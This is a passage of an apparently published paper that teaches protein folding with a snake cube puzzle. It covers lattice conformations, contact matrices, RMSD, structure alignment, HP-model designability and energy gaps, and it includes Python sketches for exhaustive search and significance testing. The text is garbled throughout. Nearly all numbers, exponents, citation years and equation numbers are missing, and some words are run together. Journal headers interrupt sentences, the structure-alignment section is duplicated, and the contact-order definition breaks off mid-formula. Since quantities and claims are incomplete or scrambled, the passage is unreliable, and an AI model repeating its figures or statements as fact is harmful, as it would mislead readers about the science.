numerical computations show that the number of self-avoiding walks on the cubic lattice scales as nγµn for large n , with µ≈ . (bellemans, ), close to the maximum possible value, so that the number of conformations of a -mer is of the order of ∼ . the enormousness of these numbers offers the opportunity to introduce the well known levinthal’s paradox (levinthal, ) as a starting point for a course focused on protein folding. inlatticemodelsofproteinfoldingitisoftenassumedthatfoldedproteinsarerepresented by maximally compact conformations. in the case of the -mer, these are conformations that occupy the × × cube. this number also increases exponentially, although with a smaller exponent whose asymptotic value can be computed analytically, for instance it is µ= /e ≈ . on the cubic lattice (pande et al., ). thus the number is huge nido et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure conformations of the -mer and -mer. (a): maximally compact conformations. (b): partly open conformation that illustrates the similarity between the model and two protein domains connected through a hinge. (c): fully extended conformations, where one can see the consecutive rigid fragments of size and (for the -mer) and size ( -mer). (of the order of for the -mer). an algorithm to generate exhaustively all maximally compact conformations of the -mer model was proposed in shakhnovich & gutin ( ). with respect to these numbers, the puzzle presents a huge reduction of the conformation space due to the constraints on the direction that each step can take. indeed, linearly arranged consecutive units can be regarded as a single rigid fragment of size , or ( -mer) and , , or ( -mer). these rigid blocks can be easily seen in fig. c. the number of fragments is much smaller than the number of units. in addition, two consecutive rigid fragments have only four self-avoiding conformations (two consecutive fragments cannot extend in the same dimension). consequently, due to these constraints the -mer puzzle has access to only ∼ conformations. nevertheless, it is still remarkably difficult to solve it without computational help. this reduction in the order of magnitude of the number of conformations offers an opportunity to discuss how the secondary structure of proteins limits the number of different folded structures, and how secondary structure prediction helps predicting protein structure from sequence. furthermore, different fragments of the puzzle are sometimes assembled into higher order structures reminiscent of structures found in real proteins. for instance, the -merhas two consecutive blocks of size that cannot be folded unless they are placed in parallel next to each other. this configuration is remarkably similar to the nido et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. naturally occurring beta sheet secondary structure. the constraints that this folding entails subdivide the puzzle into two structurally independent modules joined by what resembles a protein hinge (see fig. b). on the other hand, there are long regions of consecutive blocks of length that can provide the opportunity to discuss the role of more flexible regions in real proteins such as large loops or intrinsically unstructured regions. 
solutions of the puzzle
after this preliminary descriptive analysis of the puzzle we propose the first computational exercise, which consists in programming a search algorithm that generates all the maximally compact conformations (i.e., the solutions of the snake puzzle folded in a cube). the solution that we describe in ‘materials and methods’ starts from one end of the chain and exhaustively builds all the conformations of the blocks of the puzzle that fit into a cube of size (for the -mer) or ( -mer). we provide the source code along with the algorithm as supplementary material (see ‘data availability’) to the present paper. it has to be noted that the time taken by our search algorithm grows exponentially with the number of fragments, in accordance with a recent work that shows that the snake puzzle is an np-complete problem (abel et al., ), i.e., loosely speaking, a problem that cannot be solved exactly by any algorithm whose computation time grows only polynomially with system size. thus, while it would be impossible to apply this algorithm to much larger systems, modern computers are readily capable of handling the calculations for the -mer. stochastic algorithms can find solutions in shorter times at the expense of an exhaustive exploration, and they are of interest in the context of protein folding.
to characterize the bottlenecks of the search algorithm, we monitor in which regions of the puzzle the exhaustive search spends more time. in fig. we plot the histogram of the number of times a fragment is visited during two exhaustive searches that start from the two ends of the chain. to understand the relationship between the search and the constraints imposed by the fragments, we depict in the histogram the position of the rigid fragments of size larger than two. we observe that there is an intense search around the regions where many consecutive small fragments accumulate. on the other hand, the search is drastically reduced when the algorithm finds large consecutive fragments (see, for instance, the two rigid fragments of size separated by a fragment of size ) because there are few possible conformations compatible with valid spatial coordinates. it is interesting to observe that the number of steps needed to find the solutions varies depending on the end of the chain from which the algorithm starts. this observation suggests that the puzzle may be solved faster if we start the algorithm from regions with more restrictive constraints.
figure: number of times that a given rigid fragment is visited by the folding algorithm (x-axis: chain element number; y-axis: number of visits during folding). the search starts either from the first (blue histogram) or from the last fragment of the chain (red) and explores all maximally compact conformations; positions with blocks of length larger than two are depicted over the histograms.
through the exhaustive search, we find eight solutions for the -mer puzzle that we show in fig. . these solutions will be labelled hereafter as s , s , ..., s . the students can be requested to visually inspect the solutions through standard visualization software such as pymol (delano, ) or vmd (humphrey, dalke & schulten, ). for a review on software for protein structure visualization see o’donoghue et al. ( ). for this exercise, it is necessary to transform the format of the files with spatial coordinates. this gives us the opportunity to discuss the different file formats, with their flaws and advantages, and to stress the importance of format standardization in bioinformatics (gibas & jambeck, ).
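a compact sketch of such an exhaustive backtracking search is shown below. it folds a chain specified by a straight/turn pattern into a k × k × k cube and also derives the lattice contact matrices introduced in the next section. the straight/turn string, the function names, and the absence of any symmetry reduction (rotations and mirror images are counted separately) are illustrative assumptions, and the pattern given is a stand-in rather than the pattern of the commercial puzzle, so it may admit a different number of solutions (or none).

```python
import numpy as np

AXES = [(1, 0, 0), (-1, 0, 0), (0, 1, 0), (0, -1, 0), (0, 0, 1), (0, 0, -1)]

def solve(shape, k=3):
    """Exhaustive backtracking search for all ways of folding the chain into a
    k x k x k cube. `shape[i]` in {'s', 't'} says whether interior block i + 1
    continues straight or turns; len(shape) == k**3 - 2. Returns the list of
    solutions as (k**3, 3) coordinate arrays (no symmetry reduction)."""
    n = k ** 3
    sols = []

    def inside(p):
        return all(0 <= c < k for c in p)

    def step(coords, occupied, prev_dir):
        i = len(coords)                    # index of the block being placed
        if i == n:
            sols.append(np.array(coords))
            return
        if prev_dir is None:               # second block: no constraint yet
            dirs = AXES
        elif shape[i - 2] == 's':          # straight: keep the same direction
            dirs = [prev_dir]
        else:                              # turn: any perpendicular direction
            dirs = [d for d in AXES if np.dot(d, prev_dir) == 0]
        for d in dirs:
            p = tuple(np.add(coords[-1], d))
            if inside(p) and p not in occupied:
                step(coords + [p], occupied | {p}, d)

    for start in np.ndindex(k, k, k):
        step([tuple(start)], {tuple(start)}, None)
    return sols

def contact_matrix(coords):
    """Lattice contact matrix: 1 if units i and j are nearest neighbours on the
    lattice and not consecutive along the chain."""
    d = np.abs(coords[:, None, :] - coords[None, :, :]).sum(axis=2)
    c = (d == 1).astype(int)
    for i in range(len(coords) - 1):       # remove bonded pairs
        c[i, i + 1] = c[i + 1, i] = 0
    return c

# hypothetical straight/turn string for a 27-block chain; replace it with the
# pattern of the physical puzzle at hand
shape = "tsttttsttsttttsttttstttst"
solutions = solve(shape, k=3)
print(len(solutions), "folded conformations found")
```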
the contact matrix
at this point, it is convenient to introduce a reduced representation of protein structures that arises naturally in the context of lattice polymers, and that will play an important role in the following: the contact matrix. this binary matrix has value $c_{ij}=1$ if two units $i$ and $j$ contact each other in space in the polymer conformation, and $c_{ij}=0$ otherwise:
$$ c_{ij} = \begin{cases} 1 & \text{if } d_{ij} \le d \\ 0 & \text{otherwise} \end{cases} $$
bonded units ($j = i \pm 1$) are excluded from this count because they contact each other in all conformations. in lattice polymers, the condition for contact is that two units are nearest neighbours in the lattice, i.e., $d$ is the lattice spacing. we provide the contact matrices of the eight solutions of the snake puzzle in the supplementary material (see ‘data availability’) since they are needed to perform the exercises that we describe in the following. figure shows the four different types of locations that a monomer can occupy within the maximally compact structure and the number of contacts that it has in each case. the same figure also shows an intermediate conformation of two similar solutions, s and s , depicting only their common structure and the first different fragment. the associated contact matrices are represented below, highlighting the differences determined by the alternative positions of the last fragment.
figure: the eight solutions of the -mer puzzle. although the solutions cannot be superimposed, they represent four pairs of mirror images, analogous to naturally occurring enantiomers of chemical substances. in the figure, each pair of related solutions is depicted with the same color (s & s , s & s , s & s , s & s ). the figure was generated using coordinate files in pdb format, whose documentation can be obtained at http://www.wwpdb.org. the source code provided in the supplementary material (see ‘data availability’) outputs pdb files that can be explored using any standard protein structure visualization software.
contact matrices are also used as a simplified representation of real protein structures. two residues $i$ and $j$ are considered in contact if their closest non-hydrogen atoms are closer than a threshold, typically d = . Å (the main reason to exclude hydrogen atoms is that they are often not reported in pdb files obtained with x-ray crystallography). pairs are considered in contact only if |i−j| > , since neighbours along the chain trivially fulfil the contact condition in all conformations. the contact matrix provides a simple visual representation that makes secondary structure elements evident: alpha-helices appear as lines of contacts $(i,i+3)$ and $(i,i+4)$ parallel to the diagonal; parallel beta sheets, $(i,i+l)$, and antiparallel beta sheets, $i+l=\text{const}$, appear as lines perpendicular to the diagonal. importantly, the contact matrix is independent of the reference frame used to represent the coordinates.
this point gives a good opportunity for a general discussion on the modelling process in biology and its epistemological and practical implications. protein molecules are extremely complex. they are made of thousands of atoms bound together by quantum interactions.
although not covalently bound, the water solvent is essential in determining the properties of a protein (dynamics, thermodynamic stability, catalytic function...). if we want to make quantitative predictions, we have to reduce this complexity to a simplified model that is amenable to computation. in a statistical mechanical framework, a simplified (mesoscopic) model must be imagined as the result of integrating out some degrees of freedom of the system (the quantum interactions, the water molecules, the hydrogen atoms, the side chains...) and retaining only those that are either most relevant or simplest nido et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.wwpdb.org http://dx.doi.org/ . /peerj-cs. figure contact matrix representation. (a) illustration of the four different types of locations where a monomer can be found in a maximally compact structure and the contacts that it will has in each case. a given monomer may have from one to four contacts, with the exception of the first and last monomers, which can present an additional contact up to a maximum of five. (b) conformations and contact matri- ces of two similar solutions s and s . in the conformations, for clarity we show only the part that is com- mon to both solutions and the first fragment that is different. the upper triangular matrix shows the con- tacts of s and s , highlighting in red the contacts present in s that are absent in s (shown in the con- formation s in red as well). the grey shaded area in the matrix corresponds to the monomers not shown in the above conformations. the distance in sequence between the contacts can be seen in the arcs repre- sentation depicted in the left of the matrix. the lower triangular matrix represents the number of shared contacts among the four non-redundant solutions. to handle, allowing quantitative predictions. the contact matrix is one such mesoscopic representation. to define it, we need arbitrary choices (the definition of the distance between residues) and parameters (the threshold distance). this is an unavoidable (and indeed desirable) feature of the modelling process. nido et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. contact energy function nevertheless, although the modelling choices may seem plausible, it is important that they are tested a posteriori for their predicting ability, and that parameters are optimized by comparison with experimental data, if it is possible. in the case of protein contact matrices, predictions are obtained from statistical mechanical models that present a simple contact energy function: e(c,a)= ∑ i<j cijuij ( ) where cij is the contact matrix and uij is the contact interaction energy between residues i and j that are in contact, which may be imagined as the result of averaging out all other degrees of freedom in a thermodynamic ensemble subject to the constraint that i and j are in contact. such implicit computation is of course impossible to realize, and researchers adopt two main types of contact free energy functions. the first type belongs to the broad category of knowledge-based energy functions. 
in this case, $u_{ij}$ depends on the type of amino acids at positions $i$ and $j$, $u_{ij}=u(a_i,a_j)$, where $a_i$ denotes the amino acid type at position $i$ and $u(a,b)$ is a 20 × 20 symmetric interaction matrix derived from large databases of protein structures and sequences, with the aim to rationalize or predict the folding stability of proteins, such as, for instance, the miyazawa and jernigan potential (miyazawa & jernigan, ). the second type belongs to the category of structure-based energy functions, which are determined from each experimentally determined protein native structure in such a way that the native structure has minimum free energy and the native state is minimally frustrated, i.e., all native interactions (and only them) are stabilizing, and all pairs of atoms that interact in the native state minimize their interaction energy: $u_{ij}=-c^{\mathrm{nat}}_{ij}$, where $c^{\mathrm{nat}}$ is the native contact matrix. some structure-based models are constructed as an explicit function of the inter-residue distance $d_{ij}$, $e=\sum_{ij} c^{\mathrm{nat}}_{ij}\, f_{ij}(d_{ij})$. the minimum frustration principle (bryngelson & wolynes, ) requires that the minimum of each pairwise interaction $f_{ij}$ corresponds to the native distance $d^{\mathrm{nat}}_{ij}$. structure-based models are used to predict protein dynamics close to the native structure through normal mode analysis (the so-called elastic network model) (tirion, ; bahar & rader, ) or to predict the thermodynamics and kinetics of the folding process (taketomi, ueda & gō, ) and, despite their simplicity, they provide accurate predictions that compare favourably with experimental observations, as can be seen in reviews on these subjects (bastolla, ; chan et al., ).
contact order
an important quantity that can be computed from the contact matrix is the absolute contact order (aco), defined as:
$$ \mathrm{aco} = \frac{\sum_{i<j} c_{ij}\,|i-j|}{\sum_{i<j} c_{ij}} $$
we can measure the similarity between any two polymer structures sx and sy through the contact overlap: contact overlap= ∑ ij c (x) ij c (y) a(i)a(j)√∑ ij c (x) ij ∑ ij c (y) ij . ( ) this measure is zero if the structures do not share any contact, and one if they share all contacts. we can ask the students to compute the contact overlap between all pairs of solutions of the -mer, which are reported in table . it can be noted that several off-diagonal pairs have overlap equal to one, meaning that their contact matrix is exactly the same. this result is puzzling, since our algorithm guarantees that all solutions are different, in the sense that they cannot be superimposed through rigid body rotations or translations. we can ask the students to explain this fact. the answer is that structures with overlap equal to one are related through a mirror reflection—they correspond to chemical enantiomers. it can be shown (see ‘material and methods’) that mirror images can be excluded by the search algorithm through a suitable control of the axes. in the following, we will only consider one of each pair of enantiomers (s , s , s , and s ) to avoid redundancy. figure compares the contact matrices of the structures s and s . a summary of the contacts found for all four non-redundant solutions is also shown. nido et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure network representation of the solutions. the black line represents the chain and each white dot represents an opposite end of the rigid fragment. the distance between dots is proportional to the length of the fragment. each position in the chain is connected with other positions if they are in con- tact in the folded solution. longer arcs have a larger contribution to the contact order. (a) representa- tion for the four non redundant solutions. solutions s and s have contacts with larger contact orders whereas solution s has the shortest. (b) the same representation integrating all four solutions. the width of the arc is proportional to the number of structures sharing the contact. the colour code quantifies the distance between each pair of residues (terms in the numerator of eq. ( )) normalized by the length of the chain (which is the same for all solutions). we note a region of four contacts on the right half of the chain common to all solutions which corresponds to the peak shown in fig. . the number of contacts per residue is shown for each solution, together with the average. note that solution s has the most dissimilar profile. nido et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table pairwise comparison of the solutions of the snake puzzle through the contact overlap. note that there are several off diagonal values with overlap one (perfect similarity) representing non- superposable mirror images. contact overlap s s s s s s s s s . . . . . . . . s . . . . . . . s . . . . . . s . . . . . s . . . . s . . . s . . s . optimal superposition. 
root mean square deviation at this point, it is interesting to compare the properties of the contact overlap with another measure of structural distance, the root mean square deviation rmsd=minr √ n ∑ i ∣∣∣er(x)i −rer(y)a(i)∣∣∣ , ( ) where er(x)i indicates the coordinates of atom i in structure x, |·| is the euclidean distance, r denotes a rotation matrix that has to be optimized to find the optimal superimposition, and both er(x)i and er (y) i are translated in such a way that their centers of mass stay at the origin. the above formula for the rmsd helps to avoid the confusion between alignment a(i) and superposition r, which is frequent among students. instead of comparing interatomic distances between pairs of atoms as the contact overlap does, the rmsd compares the distances of individual aligned atoms after optimal superimposition, which is apparently simpler. however, this simplification is obtained at the price to determine the optimal rotation matrix r that minimizes the rmsd. this minimization can be performed analytically through the classical algorithm by kabsch based on singular value decomposition. nevertheless, the optimal superimposition is strongly influenced by the aligned atom i that is farther away in the two structures. this determines a trade-off between alignment length and rmsd, since we can decide not to align residues that are too distant, obtaining shorter alignments with smaller rmsd. in this sense, the measure of the rmsd is not uniquely determined unless the alignment is trivial. on the contrary, the contact overlap is independent of the superimposition and, apart for the computation time, it is possible in principle to determine the alignment that maximizes the contact overlap without any arbitrary choice. it is important to note that the rmsd is expected to be only loosely correlated with distances in energy, since flexible regions can produce large rmsd at a small energetic cost. the same transformation is expected to maintain a large contact overlap, since flexible regions are characterized by few contacts (wallin, farwer & bastolla, ). nido et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. structure alignments after discussing the notion of spatial superposition, we can now discuss the concept of structure alignment. this is easier adopting the contact overlap. in this context, the optimal pairwise alignment a(i) can be defined as the alignment that maximizes the contact overlap eq. ( ). since protein structure is conserved through evolution, we expect that pairs of aligned residues associated through the correspondence a(i) are likely to be evolutionarily related (homologous). it is clear that the algorithm for finding the optimal structure alignment given a scoring scheme will be more complex than the algorithm for finding the optimal sequence alignment that depends only on the similarity between the individual amino acids at positions i and a(i). it can be shown that the structure alignment based on the contact overlap is an np-complete problem, which, loosely speaking, means that no algorithms that runs in polynomial time can guarantee to find the optimal solution in all cases, while for pairwise sequence alignments the optimal solution can be found in polynomial time through dynamic programming. 
structure alignments
after discussing the notion of spatial superposition, we can now discuss the concept of structure alignment, which is easier to introduce by adopting the contact overlap. in this context, the optimal pairwise alignment $a(i)$ can be defined as the alignment that maximizes the contact overlap of eq. ( ). since protein structure is conserved through evolution, we expect that pairs of residues associated through the correspondence $a(i)$ are likely to be evolutionarily related (homologous). it is clear that the algorithm for finding the optimal structure alignment given a scoring scheme will be more complex than the algorithm for finding the optimal sequence alignment, which depends only on the similarity between the individual amino acids at positions $i$ and $a(i)$. it can be shown that structure alignment based on the contact overlap is an np-complete problem, which, loosely speaking, means that no algorithm that runs in polynomial time can guarantee to find the optimal solution in all cases, while for pairwise sequence alignments the optimal solution can be found in polynomial time through dynamic programming. nevertheless, good heuristic algorithms exist, such as the monte carlo algorithm implemented in the structural alignment program dali (holm & sander, ), which is conceptually related to the optimization of the contact overlap. on the other hand, there is no structure alignment method based on the minimization of the rmsd. in fact, when we superimpose two aligned proteins, the optimal superimposition is strongly affected by pairs of residues $i, a(i)$ with large distance, typically located in flexible regions. consequently, the optimal superimposition $R$ may place the atoms in the structural cores of the two proteins far apart for the sake of improving the superposition of outliers. therefore, for distantly related proteins, it is preferable to superimpose only the structural cores, constituted by pairs of residues whose interatomic distance is smaller than a threshold. this introduces a trade-off between the alignment $a$, the structural superimposition $R$ and the core definition, which must be sorted out through the choice of the threshold and some kind of heuristic, as in the structure alignment program mammoth (ortiz, strauss & olmea, ). instead of applying a fixed threshold to define the core, the program tm-align computes the average distance between unrelated residues as a function of the protein length, and adopts this function in such a way that only pairs that are closer than expected by chance give a positive contribution to the structural similarity (zhang & skolnick, ). tm-align is one of the most reliable structure alignment programs based on rigid superimposition. notably, methods have also been proposed that consider flexible superposition, in which different rigid-body transformations are applied to different protein domains (e.g., protdeform; rocha et al., ).

protein structure classification
protein structure comparison may also be a convenient starting point for introducing protein structure evolution. we will base our analysis on protein superfamilies, groups of bona fide evolutionarily related protein domains that are structurally similar and can be found in structural classification databases such as scop (murzin et al., ) and cath (orengo et al., ). comparing proteins within a superfamily, it was found that protein structure divergence and protein sequence divergence are linearly related. this result was first established based on the rmsd of aligned and superimposed protein cores (chothia & lesk, ) and later extended to other measures of structural change, allowing one to quantify the statement that protein structure is more conserved than protein sequence (illergård, ardell & elofsson, ). in this context, our group introduced the contact divergence (cd) (pascual-garcía et al., ), a measure of structural divergence derived from the contact overlap and analogous to the poisson distance between protein sequences, in such a way that the cd is expected to be related to the time during which proteins diverged in evolution. by comparing the contact divergence in protein structure space with the poissonian distance between the corresponding sequences, we found that structure evolution is slower than sequence evolution by a factor that ranges from . to . for different superfamilies (pascual-garcía et al., ).
importantly, proteins that conserve exactly the same molecular function appear to be limited in their cd, which suggests that homology modelling can be rather successful in the case of function conservation, whereas structure evolution is more irregular and the cd explodes for proteins that change their molecular function. the observation that protein structures may be largely different within the same superfamily leads us to challenge the concept that protein structure space is organized in discrete regions called "folds" that represent well-defined equivalence classes of protein structures, an idea that underlies most structural classifications of proteins (orengo et al., ; murzin et al., ; holm & sander, ). more recently, an alternative view has been gaining force, which sees protein structure space as constituted by discrete folds only at very high similarity, while at low similarity structure space is continuous and should be described as a network rather than as a tree (dokholyan, shakhnovich & shakhnovich, ; pascual-garcía et al., ; skolnick et al., ; sadreyev, kim & grishin, ).

sequence-structure relationship and protein designability
the key to protein evolution is the relationship between the protein sequence, which evolves through time, and protein structure and function. the very simple models presented in this unit can constitute a suitable introduction to this subject. we can define the sequence-structure relationship within the contact energy model of eq. ( ), where a contact matrix $C_{ij}$ represents the mesoscopic state made of all structures with contact matrix $C_{ij}$, and eq. ( ) represents its effective free energy, with all other degrees of freedom averaged out. in principle the effective energy depends on the temperature and the state of the solvent, but these dependencies will be kept implicit. we assume that the contact interaction energies depend on the protein sequence as $U_{ij}=U(a_i,a_j)$, where $a_i$ denotes the amino acid type at position $i$. to keep things as simple as possible, we consider the hp model, which groups the amino acids into two types, hydrophobic (h) and polar (p). more realistic models consider the twenty natural amino acid types and a correspondingly larger set of contact interaction parameters. this simple hp model is sufficient to reproduce many qualitative features of protein folding; indeed, hydrophobicity is considered the main force that stabilizes folded proteins. we adopt the parametrization suggested by li et al. ( ), with contact energies $U(h,h)$, $U(h,p)$ and $U(p,p)$ that satisfy the following physical constraints: ( ) more compact conformations with more contacts have lower energies, ( ) hydrophobic monomers are buried as much as possible, and ( ) different types of monomers tend to segregate, which is achieved if $2\,U(h,p)>U(h,h)+U(p,p)$. for a given sequence, the ground state of this model is the contact matrix with the lowest effective energy among all physically feasible contact matrices that satisfy the strong conditions of chain connectivity, excluded volume (the self-avoiding interactions) and secondary structure (if we consider real protein structures). while the number of all possible contact matrices is huge, most of them are unfeasible, since the number of self-avoiding walks increases only exponentially with the number of monomers $l$.
as a model of feasible contact matrices, we can consider the contact matrices of compact self-avoiding walks on the cubic lattice or the contact matrices of real protein structures. here, for the sake of simplicity, we will limit our computations to the solutions of the snake puzzle. this is analogous to the toy model of protein folding based on the maximally compact structures on the cubic lattice introduced by shakhnovich and coworkers (shakhnovich & gutin, ). as suggested by several works, we identify the native state of a protein sequence with the ground state of its effective energy (more realistic models also impose conditions on the stability with respect to alternative compact conformations, as we will see in the following). this allows us to define the designability of a given structure as the number of sequences for which this structure is the ground state. more designable structures are expected to be more resistant to sequence mutations. mutational robustness has been proposed to be important to reduce the deleterious effects of erroneous protein translation in the ribosomes (drummond & wilke, ) and to mitigate the mutation load determined by unviable offspring generated under a strong mutation rate (bloom et al., ; lauring, frydman & andino, ). furthermore, it has been shown that robustness favours the evolution of new protein functions (soskine & tawfik, ). similar considerations motivated the computational study by li et al. ( ), who considered as feasible states the contact matrices of the maximally compact self-avoiding walks of steps on the cubic lattice, whose number was enumerated by shakhnovich & gutin ( ), and evaluated their designability in the space of sequences of h and p. here we propose that the students reproduce this computation, adopting as feasible structures three of the solutions of the snake puzzle: s , s or s . we discard the solution s because it is very similar to s (see the contact overlap values in table ) and it should be considered part of its native valley rather than an alternative conformation. a minimal computational sketch of this counting exercise is given below. figure shows the results for the three structures considered, for an increasing number of sequences (see 'materials and methods'). li et al. ( ) observed that the distribution of the number of structures designed by s sequences decays exponentially with s, which means that there are few structures with high designability and many with low designability. of course three structures are too few to test this behaviour, but it is interesting that there are important differences between the three structures, and s stands out as more designable than the rest.

figure: designability of selected structures for an increasing number of random sequences. we observe significant differences between the structures, which tend to a well-defined limit as the number of sequences increases.

this exercise allows us to emphasize the importance of assessing the statistical significance and the statistical errors of computational studies. the differences that we observe are relevant only if they are statistically significant, i.e., if the probability that they arise by chance is lower than a predetermined threshold (typically, 0.05).
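a minimal sketch of the designability computation described above: random hp sequences are drawn, the contact energy of each candidate structure is evaluated with eq. ( ), and each sequence is assigned to its lowest-energy structure. the interaction values below are the ones commonly quoted for the li et al. parametrization and should be treated as an assumption, as should the function names.

```python
# sketch: estimate the designability of a few candidate structures
# (given as binary contact matrices) by counting lowest-energy assignments.
import numpy as np

rng = np.random.default_rng(0)
U = {('H', 'H'): -2.3, ('H', 'P'): -1.0,
     ('P', 'H'): -1.0, ('P', 'P'): 0.0}          # assumed li et al.-style values

def contact_energy(c, seq):
    """effective energy e(c, a) = sum_{i<j} c_ij u(a_i, a_j)."""
    c = np.asarray(c)
    l = len(seq)
    return sum(U[(seq[i], seq[j])]
               for i in range(l) for j in range(i + 1, l) if c[i, j])

def designability(structures, n_seq, length, p_polar=0.5):
    """fraction of random sequences assigned to each candidate structure."""
    counts = np.zeros(len(structures))
    for _ in range(n_seq):
        seq = ''.join(rng.choice(['P', 'H'], p=[p_polar, 1 - p_polar], size=length))
        energies = [contact_energy(c, seq) for c in structures]
        counts[int(np.argmin(energies))] += 1
    return counts / n_seq
```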
we propose two methods to verify that they are indeed significant. the first one, more rigorous, is based on the binomial distribution: given any structure $a$, we can compute the probability that the number of sequences assigned to $a$, $s_a$ out of the total of $s$ sequences tested, is the result of $s$ trials with success probability $1/3$, as if all three structures had the same probability. if all these probabilities are small, then the designabilities are significantly different. the second method, easier to apply in general, consists in computing the standard error of the mean of the designability $p_a$, $\sigma_a=\sqrt{p_a(1-p_a)/s}$, and performing an unpaired z-test with $z=(p_a-p_b)/\sqrt{\sigma_a^2+\sigma_b^2}$ for all pairs of structures. with 0.05 as significance threshold, the binomial test finds the difference from equal frequencies not significant for the smallest sequence sets (except for s ) but significant for the larger ones, for all structures. the z-test yields the same result (in this case, s is not significant only for the smallest set).
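the two significance checks can be sketched as follows; the exact binomial tail uses the null probability $1/3$ appropriate for three candidate structures, the z-test follows the formula given above, and scipy is assumed to be available.

```python
# sketch: exact binomial test and unpaired z-test for designability differences.
import math
from scipy.stats import binom

def binomial_pvalue(s_a, s_total, p0=1.0 / 3.0):
    """two-sided tail probability of observing a count at least as extreme as
    s_a under the null that each structure is chosen with probability p0."""
    expected = s_total * p0
    if s_a >= expected:
        tail = binom.sf(s_a - 1, s_total, p0)    # p(x >= s_a)
    else:
        tail = binom.cdf(s_a, s_total, p0)       # p(x <= s_a)
    return min(1.0, 2.0 * tail)

def z_test(p_a, p_b, s_total):
    """z statistic and two-sided p-value for two estimated designabilities."""
    sigma_a = math.sqrt(p_a * (1.0 - p_a) / s_total)
    sigma_b = math.sqrt(p_b * (1.0 - p_b) / s_total)
    z = (p_a - p_b) / math.sqrt(sigma_a**2 + sigma_b**2)
    return z, math.erfc(abs(z) / math.sqrt(2.0))
```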
misfolding stability and energy gap
it has been noted in several works that the analogy between the polymer model and protein folding only makes sense if the ground state structure, identified as the native state, is much more stable than the alternative structures, which collectively represent the misfolded ensemble. one of the first parameters used to assess the stability of the putative native state has been the energy gap between the putative native state and the misfolded conformation with minimum energy among those not in the attraction basin of the native state (sali et al., ). if this gap is small, the native state lacks thermodynamic stability, since a small change in the parameters of the effective energy function, corresponding to a change of temperature or ph, would produce a different ground state; it lacks stability against mutations in the sequence, for similar reasons; and it is very difficult to reach kinetically, since the dynamics of the model polymer can become trapped in low-energy conformations outside the native basin. in their work cited above, li et al. ( ) found that more designable structures have a larger energy gap, and that the energy gap averaged over the sequences assigned to a given structure clearly separates the maximally designable structures from the rest. in our toy model there is one "native" and only two "misfolded" conformations. we denote by $E(C_i,A_k)$ the effective energy of sequence $A_k$ in structure $i$, and we define the energy gap as the effective energy difference between the "native" structure and the alternative conformation with lowest energy,

$$\delta E(C_i,A_k)=E(C_i,A_k)-\min_{j\neq i}E(C_j,A_k). \qquad ( )$$

this quantity has then to be averaged over all sequences $A_k$ assigned to structure $C_i$, which we denote with an overline:

$$\overline{\delta E}(C_i)=\overline{E(C_i,A_k)-\min_{j\neq i}E(C_j,A_k)}. \qquad ( )$$

the values of the average energy gap are shown in fig. . we can see that, consistently with the results reported by li et al. ( ), the structure s has both the highest designability and the largest energy gap, and that these differences are significant. we can then ask students whether this correlation between designability and energy gap is surprising or whether it should be expected based on the definitions.

figure: average energy gap for the three chosen structures, s (green), s (orange) and s (pink). the structure s shows a significantly higher value than the others.

another measure of the stability of the misfolded ensemble, more standard from the point of view of statistical mechanics, is its free energy, which can be evaluated through a simplified statistical mechanical model. we assume that the protein can exist in three macroscopic states: the native state (the attraction basin of the contact matrix with minimum effective energy, which can be described for instance through the structure-based elastic network model mentioned above), the unfolded state (analogous to the self-avoiding-walk model, with large conformational entropy and effective contact energy close to zero), and the misfolded state (alternative compact conformations dissimilar enough from the native structure). we describe each of these states (native, misfolded and unfolded) by a free energy which, at constant volume and temperature, is given by the difference between the total energy $E$ and the conformational entropy $S$ multiplied by the absolute temperature, i.e., the helmholtz free energy $G=E-TS$. furthermore, the helmholtz free energy is proportional to the logarithm of the partition function of the canonical ensemble, $G=-k_B T\log Z$, an important equation that relates macroscopic thermodynamic quantities to the microscopic details encoded in the partition function $Z$. in the following, we show how the free energies of the different states can be estimated, and how we can define the folding free energy of the model polymer $\Delta G$ as the difference between the free energy of the native state and that of the unfolded plus misfolded states (the non-native state). this gives us the opportunity to stress that both unfolding and misfolding are important and should be taken into account. we approximate the free energy of the native state by its effective contact energy, $G_{\mathrm{nat}}(A)=\sum_{i<j}C^{\mathrm{nat}}_{ij}U(a_i,a_j)$, where $C^{\mathrm{nat}}_{ij}$ indicates the contact matrix of the native structure. note that we should also take into account the conformational entropy of the native state, derived from the volume in phase space of the structures that share the native contact matrix, but this conformational entropy is expected to be similar to that of misfolded contact matrices (karplus, ichiye & pettitt, ), so that it contributes little to $\Delta G$. the free energy of the unfolded state is approximated by its conformational entropy term, which is proportional to the number of residues (for instance, for a self-avoiding walk of $l$ steps with $\mu^{l}$ conformations the free energy would be $G_{\mathrm{unf}}=-k_B T\,l\log\mu$). for a more realistic model, we should consider the number of degrees of freedom that are not frozen (typically, the torsion angles phi and psi of the main chain and chi of the side chains) and the limitations to their movement imposed by atomic interactions, in particular the repulsion that motivates the self-avoiding-walk model. an approximation that is often used is $G_{\mathrm{unf}}(A)=-T\sum_i s(a_i)$, where the conformational entropy of residue $a_i$, $s(a_i)$, is an empirical value that mainly depends on its number of chi angles. the term that is most difficult to estimate, and that is often neglected in computational models despite its importance, is the free energy of the misfolded state. in the context of the contact energy model, this term can be estimated by exploiting the analogy with the random energy model (rem) (derrida, ).
for an analysis of the selective pressures dictated by stability against misfolding and predicted through the rem approximation, see minning, porto & bastolla ( ). the first term of the free energy expansion of the rem is just the average effective energy of alternative conformations, which is very simple to compute. we denote by $\langle\cdot\rangle$ the average over the ensemble of alternative compact conformations, and we approximate the free energy of the misfolded ensemble by the average energy of misfolded contact matrices,

$$G_{\mathrm{misf}}(A)=\sum_{i<j}\langle C_{ij}\rangle\,U(a_i,a_j)\approx\frac{2N_c}{l(l-1)}\sum_{i<j}U(a_i,a_j), \qquad ( )$$

